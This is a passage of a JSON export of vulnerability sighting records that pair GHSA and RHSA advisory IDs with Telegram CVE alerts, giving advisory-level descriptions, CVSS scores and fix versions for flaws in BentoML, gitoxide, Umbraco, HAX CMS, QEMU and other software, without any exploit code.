"2025-04-07T20:46:11.000000Z"}, {"uuid": "63778bb7-8143-48bf-87bc-13ad7d579fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33XW-247W-6HMC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10476", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27520\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3.\n\ud83d\udccf Published: 2025-04-04T14:28:51.574Z\n\ud83d\udccf Modified: 2025-04-04T14:51:45.561Z\n\ud83d\udd17 References:\n1. https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc\n2. https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194", "creation_timestamp": "2025-04-04T15:37:02.000000Z"}, {"uuid": "bb0c4add-51be-4d96-85d4-1f5938bec8c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2FRX-2596-X5R6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10475", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31130\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N)\n\ud83d\udd39 Description: gitoxide is an implementation of git written in Rust. Before 0.42.0, gitoxide uses SHA-1 hash implementations without any collision detection, leaving it vulnerable to hash collision attacks. gitoxide uses the sha1_smol or sha1 crate, both of which implement standard SHA-1 without any mitigations for collision attacks. This means that two distinct Git objects with colliding SHA-1 hashes would break the Git object model and integrity checks when used with gitoxide. This vulnerability is fixed in 0.42.0.\n\ud83d\udccf Published: 2025-04-04T14:41:56.355Z\n\ud83d\udccf Modified: 2025-04-04T14:51:51.207Z\n\ud83d\udd17 References:\n1. https://github.com/GitoxideLabs/gitoxide/security/advisories/GHSA-2frx-2596-x5r6\n2. https://github.com/GitoxideLabs/gitoxide/commit/4660f7a6f71873311f68f170b0f1f6659a02829d", "creation_timestamp": "2025-04-04T15:37:01.000000Z"}, {"uuid": "66ba0aa2-a1a2-465c-9311-4a2c4f2cfaae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q62R-8PPJ-XVF4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10929", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32017\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Umbraco is a free and open source .NET content management system. Authenticated users to the Umbraco backoffice are able to craft management API request that exploit a path traversal vulnerability to upload files into a incorrect location. The issue affects Umbraco 14+ and is patched in 14.3.4 and 15.3.1.\n\ud83d\udccf Published: 2025-04-08T15:37:23.733Z\n\ud83d\udccf Modified: 2025-04-08T15:37:23.733Z\n\ud83d\udd17 References:\n1. https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-q62r-8ppj-xvf4\n2. https://github.com/umbraco/Umbraco-CMS/commit/06a2a500b358ce15b1e228391eb60bd517c6e833\n3. https://github.com/umbraco/Umbraco-CMS/commit/d3c1443b14b1076faf13d1bcecc42860fdf5fad8", "creation_timestamp": "2025-04-08T15:47:03.000000Z"}, {"uuid": "a6f562ce-5dfc-4b1f-b03a-6d6b1169a363", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFPW-HFCP-9M73", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10643", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31488\n\ud83d\udd25 CVSS Score: 4.9 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Plain Craft Launcher (PCL) is a launcher for Minecraft. PCL allows users to use homepages provided by third parties. If controls such as WebBrowser are used in the homepage, WPF will use Internet Explorer to load the specified webpage. If the user uses a malicious homepage, the attacker can use IE background to access the specified webpage without knowing it. This vulnerability is fixed in 2.9.3.\n\ud83d\udccf Published: 2025-04-06T19:56:24.648Z\n\ud83d\udccf Modified: 2025-04-06T19:56:24.648Z\n\ud83d\udd17 References:\n1. https://github.com/Hex-Dragon/PCL2/security/advisories/GHSA-wfpw-hfcp-9m73", "creation_timestamp": "2025-04-06T20:44:01.000000Z"}, {"uuid": "d4461175-8cbb-46e6-ac0d-49400ab15bd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RG7-WF37-54RM", "type": "published-proof-of-concept", "source": "Telegram/LwEZji0yzP27_YN8omVGHFZ6AM7CJ9LdqNK-dme10ZwkkWc", "content": "", "creation_timestamp": "2026-01-12T18:07:23.000000Z"}, {"uuid": "05891b26-27b1-45a3-95df-3cabbcd8794d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FMHH-RW3H-785M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10928", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32025\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: bep/imagemeta is a Go library for reading EXIF, IPTC and XMP image meta data from JPEG, TIFF, PNG, and WebP files. The buffer created for parsing metadata for PNG and WebP images was only bounded by their input data type, which could lead to potentially large memory allocation, and unreasonably high for image metadata. Before v0.11.0, If you didn't trust the input images, this could be abused to construct denial-of-service attacks. v0.11.0 added a 10 MB upper limit.\n\ud83d\udccf Published: 2025-04-08T15:13:24.770Z\n\ud83d\udccf Modified: 2025-04-08T15:37:58.737Z\n\ud83d\udd17 References:\n1. https://github.com/bep/imagemeta/security/advisories/GHSA-fmhh-rw3h-785m\n2. https://github.com/bep/imagemeta/commit/ee0de9b029f4e82106729f69559f27c9a404229d", "creation_timestamp": "2025-04-08T15:47:02.000000Z"}, {"uuid": "ac05c7d8-8852-4d07-b00f-5b3fd3bf1ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ5Q-3JV2-CG5P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10954", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32028\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: HAX CMS PHP allows you to manage your microsite universe with PHP backend. Multiple file upload functions within the HAX CMS PHP application call a \u2019save\u2019 function in \u2019HAXCMSFile.php\u2019. This save function uses a denylist to block specific file types from being uploaded to the server. This list is non-exhaustive and only blocks \u2019.php\u2019, \u2019.sh\u2019, \u2019.js\u2019, and \u2019.css\u2019 files. The existing logic causes the system to \"fail open\" rather than \"fail closed.\" This vulnerability is fixed in 10.0.3.\n\ud83d\udccf Published: 2025-04-08T16:06:33.976Z\n\ud83d\udccf Modified: 2025-04-08T16:06:33.976Z\n\ud83d\udd17 References:\n1. https://github.com/haxtheweb/issues/security/advisories/GHSA-vj5q-3jv2-cg5p", "creation_timestamp": "2025-04-08T16:46:45.000000Z"}, {"uuid": "19c4b84f-d6c0-4281-821c-7f160f2c70df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHHP-GMXC-46RQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10638", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2259\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In NetX HTTP server functionality of Eclipse ThreadX NetX Duo before \nversion 6.4.3, an attacker can cause an integer underflow and a \nsubsequent denial of service by writing a very large file, by specially \ncrafted packets with Content-Length in one packet smaller than the data \nrequest size of the other packet. A possible workaround is to disable \nHTTP PUT support.\n\n\n\n\nThis issue follows an incomplete fix of CVE-2025-0727\n\ud83d\udccf Published: 2025-04-06T19:01:20.233Z\n\ud83d\udccf Modified: 2025-04-06T19:01:20.233Z\n\ud83d\udd17 References:\n1. https://github.com/eclipse-threadx/netxduo/commit/fb3195bbb6d0d6fe71a7a19585c008623c217f9e\n2. https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-chhp-gmxc-46rq", "creation_timestamp": "2025-04-06T19:44:12.000000Z"}, {"uuid": "0ab41adf-1f8e-48b0-8597-7fb4ebe1d8e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7925", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "23642469-6b8c-48c2-b9a4-87e734dc8745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8112", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "fd7185d7-1f29-4c7a-901a-4be277b11b78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6964", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14626", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3446\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A double free vulnerability was found in QEMU virtio devices (virtio-gpu, virtio-serial-bus, virtio-crypto), where the mem_reentrancy_guard flag insufficiently protects against DMA reentrancy issues. This issue could allow a malicious privileged guest user to crash the QEMU process on the host, resulting in a denial of service or allow arbitrary code execution within the context of the QEMU process on the host.\n\ud83d\udccf Published: 2024-04-09T19:34:45.646Z\n\ud83d\udccf Modified: 2025-05-02T23:02:59.338Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6964\n2. https://access.redhat.com/security/cve/CVE-2024-3446\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2274211\n4. https://patchew.org/QEMU/20240409105537.18308-1-philmd@linaro.org/", "creation_timestamp": "2025-05-02T23:17:21.000000Z"}, {"uuid": "c9386af4-1035-4afe-acc2-ed29f200b4d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CXHJ-J78R-P88F", "type": "seen", "source": "Telegram/8sAp-VzdCpmBtZpXHcIlhxzqtmWknERFSKz0UU7al4qy2OU", "content": "", "creation_timestamp": "2026-01-12T20:07:23.000000Z"}, {"uuid": "64060e88-6974-4664-a72a-0315083a2c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C83V-7274-4VGP", "type": "published-proof-of-concept", "source": "Telegram/4zuUlGU6EvpMTWPbip1_D3Ts-W_MioI6unE3WF1UcmysLKI", "content": "", "creation_timestamp": "2026-01-13T00:02:07.000000Z"}, {"uuid": "fa0f8f67-f20d-4e0c-8d5b-2b5c1ce077c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X82R-6J37-VRGG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10897", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30166\n\ud83d\udd25 CVSS Score: 1.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. An HTML injection issue allows users with access to the email sending functionality to inject arbitrary HTML code into emails sent via the admin interface, potentially leading to session cookie theft and the alteration of page content. The vulnerability was discovered in the /admin/email/send-test-email endpoint using the POST method. The vulnerable parameter is content, which permits the injection of arbitrary HTML code during the email sending process. While JavaScript code injection is blocked through filtering, HTML code injection remains possible. This vulnerability is fixed in 1.7.6.\n\ud83d\udccf Published: 2025-04-08T11:07:06.672Z\n\ud83d\udccf Modified: 2025-04-08T11:07:06.672Z\n\ud83d\udd17 References:\n1. https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-x82r-6j37-vrgg\n2. https://github.com/pimcore/admin-ui-classic-bundle/commit/76b690d4f8fcd9c9d41766bc5238c2513242e60e", "creation_timestamp": "2025-04-08T11:46:23.000000Z"}, {"uuid": "86f6cdc1-7177-403f-b3d4-6ecc9ce8e8b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRWG-MQJ6-6M22", "type": "seen", "source": "Telegram/8sAp-VzdCpmBtZpXHcIlhxzqtmWknERFSKz0UU7al4qy2OU", "content": "", "creation_timestamp": "2026-01-12T20:07:23.000000Z"}, {"uuid": "8da26a56-a964-4b4e-92fb-b10db8e9ec23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58H4-9M7M-J9M4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10903", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-3145\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An open redirect vulnerability exists in Okta OIDC Middleware prior to version 5.0.0 allowing an attacker to redirect a user to an arbitrary URL.\n\ud83d\udccf Published: 2023-01-12T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-08T13:37:49.124Z\n\ud83d\udd17 References:\n1. https://github.com/okta/okta-oidc-middleware/security/advisories/GHSA-58h4-9m7m-j9m4", "creation_timestamp": "2025-04-08T13:46:32.000000Z"}, {"uuid": "8e097b2b-4eee-4ccb-bfbb-b2ed709ee678", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M779-84H5-72Q2", "type": "seen", "source": "Telegram/H1nFRtyRiOhcROcf0_NE40bSu4SNvkoqq4ZeM2FsiV7bGxI", "content": "", "creation_timestamp": "2026-01-12T20:07:33.000000Z"}, {"uuid": "1cc0bd7f-84a1-4c78-bcae-9093ef6a0265", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84M6-5M72-45FP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10905", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32033\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. Prior to 1.61.2 and 2.1.1, the operation limits plugin uses unsigned 32-bit integers to track limit counters (e.g. for a query's height). If a counter exceeded the maximum value for this data type (4,294,967,295), it wrapped around to 0, unintentionally allowing queries to bypass configured thresholds. This could occur for large queries if the payload limit were sufficiently increased, but could also occur for small queries with deeply nested and reused named fragments. This has been remediated in apollo-router versions 1.61.2 and 2.1.1.\n\ud83d\udccf Published: 2025-04-07T20:48:19.504Z\n\ud83d\udccf Modified: 2025-04-08T13:31:44.219Z\n\ud83d\udd17 References:\n1. https://github.com/apollographql/router/security/advisories/GHSA-84m6-5m72-45fp\n2. https://github.com/apollographql/router/commit/ab6675a63174715ea6ff50881fc957831d4e9564\n3. https://github.com/apollographql/router/commit/bba032e183b861348a466d3123c7137a1ae18952", "creation_timestamp": "2025-04-08T13:46:37.000000Z"}, {"uuid": "ab4390db-2d20-47b9-89df-e2bbefc4fdf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MWR6-3GP8-9JMJ", "type": "seen", "source": "Telegram/H1nFRtyRiOhcROcf0_NE40bSu4SNvkoqq4ZeM2FsiV7bGxI", "content": "", "creation_timestamp": "2026-01-12T20:07:33.000000Z"}, {"uuid": "b936c7c2-bd8d-458a-b49d-93ee0231f910", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C67J-W6G6-Q2CM", "type": "seen", "source": "Telegram/NtGdm-nKviNCWHikD-PcF3b4R8AkgqcqlHzrx8XSXT7S4dA", "content": "", "creation_timestamp": "2026-01-13T16:10:43.000000Z"}, {"uuid": "7b1c5e45-3619-47f8-abaf-990f95249fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQ88-842X-2JHP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10303", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31483\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Miniflux is a feed reader. Due to a weak Content Security Policy on the /proxy/* route, an attacker can bypass the CSP of the media proxy and execute cross-site scripting when opening external images in a new tab/window. To mitigate the vulnerability, the CSP for the media proxy has been changed from default-src 'self' to default-src 'none'; form-action 'none'; sandbox;. This vulnerability is fixed in 2.2.7.\n\ud83d\udccf Published: 2025-04-03T18:07:32.241Z\n\ud83d\udccf Modified: 2025-04-03T18:07:32.241Z\n\ud83d\udd17 References:\n1. https://github.com/miniflux/v2/security/advisories/GHSA-cq88-842x-2jhp\n2. https://github.com/miniflux/v2/commit/cb695e653a08af4cabcb277c271ce74bd0c746e6", "creation_timestamp": "2025-04-03T18:35:33.000000Z"}, {"uuid": "c0a835ef-9754-46ab-8598-c845024abae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CG3C-245W-728M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10335", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31481\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: API Platform Core is a system to create hypermedia-driven REST and GraphQL APIs. Using the Relay special node type you can bypass the configured security on an operation. This vulnerability is fixed in 4.0.22.\n\ud83d\udccf Published: 2025-04-03T19:20:22.916Z\n\ud83d\udccf Modified: 2025-04-03T19:20:22.916Z\n\ud83d\udd17 References:\n1. https://github.com/api-platform/core/security/advisories/GHSA-cg3c-245w-728m\n2. https://github.com/api-platform/core/commit/60747cc8c2fb855798c923b5537888f8d0969568", "creation_timestamp": "2025-04-03T19:35:46.000000Z"}, {"uuid": "e56e54f9-5dcd-4b14-bc5b-9581c43188a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8039", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "9c01a8b1-e0f7-4abd-be4d-6bc098e4863f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0423", "type": "seen", "source": "Telegram/bfwzVOsJpKBGXVGbU-fAyqvN9ntDEQLmDKUbUw5_xZxXiao", "content": "", "creation_timestamp": "2026-01-12T04:00:54.000000Z"}, {"uuid": "8d1e7ddb-53f0-46bb-91a3-14c1014da86e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35F7-FQRC-4HHJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11048", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-4457\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:L)\n\ud83d\udd39 Description: Due to a misconfiguration in the manifest file of the WARP client for Android, it was possible to a perform a task hijacking attack. An attacker could create a malicious mobile application which could hijack legitimate app and steal potentially sensitive information when installed on the victim's device.\n\n\n\ud83d\udccf Published: 2023-01-11T16:32:28.382Z\n\ud83d\udccf Modified: 2025-04-09T13:43:50.264Z\n\ud83d\udd17 References:\n1. https://github.com/cloudflare/advisories/security/advisories/GHSA-35f7-fqrc-4hhj", "creation_timestamp": "2025-04-09T13:47:21.000000Z"}, {"uuid": "52f735d6-e472-44d2-a5a0-68e2c1a0678a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F7V-QX94-666M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11094", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: 